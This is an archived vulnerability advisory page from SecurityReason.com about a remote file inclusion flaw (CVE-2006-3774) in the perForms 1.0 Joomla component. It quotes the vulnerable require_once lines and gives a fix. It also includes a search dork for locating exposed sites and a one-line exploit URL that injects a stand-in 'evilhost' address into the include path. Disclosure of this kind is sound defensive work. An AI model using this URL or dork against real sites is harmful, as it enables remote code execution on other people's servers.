SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion


Arrow  SecurityAlert : 1263
Arrow  CVE : CVE-2006-3774
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : endeneu linuxmail com
Arrow  Published : 25.07.2006

Arrow  Affected Software : perForms <= 1.0



Arrow  Advisory Content :  

------------------------------------------------------------------------
---

perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

------------------------------------------------------------------------
---

Remote : Yes

Critical Level : High

Vuln founded in a log file: lazy 0day!!! :D

Description:

~~~~~~~~~~~~

Application : perForms Joomla Component

Version : latest version [1.0]

URL : http://forge.joomla.org/sf/projects/performs

Variable $mosConfig_absolute_path not sanitized: xpl works with
register_globals=on

in /components/com_performs/com_performs/performs.php on lines 6-10

require_once(
$mosConfig_absolute_path."/administrator/components/com_performs/lib/lib
_template.php" );

require_once(
$mosConfig_absolute_path."/administrator/components/com_performs/lib/lib
_valid.php" );

require_once(
$mosConfig_absolute_path."/administrator/components/com_performs/lib/lib
_phpForm.php" );

require_once(
$mosConfig_absolute_path."/administrator/components/com_performs/lib/myL
ib.php" );

require_once($mosConfig_absolute_path."/administrator/components/com_per
forms/class.performs.php");

Exploit:

~~~~~~~~

dork: inurl:"com_performs" -> founds ~12.000 sites (!)

http://www.vuln.com/components/com_performs/performs.php?mosConfig_absol
ute_path=http://evilhost

Fix

~~~~

Add before code:

defined('_VALID_MOS') or die('Direct access to this location is not
allowed.');

Thx

~~~~

Who works for better code and better life!

------------------------------------------------------------------------
----------------------------





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.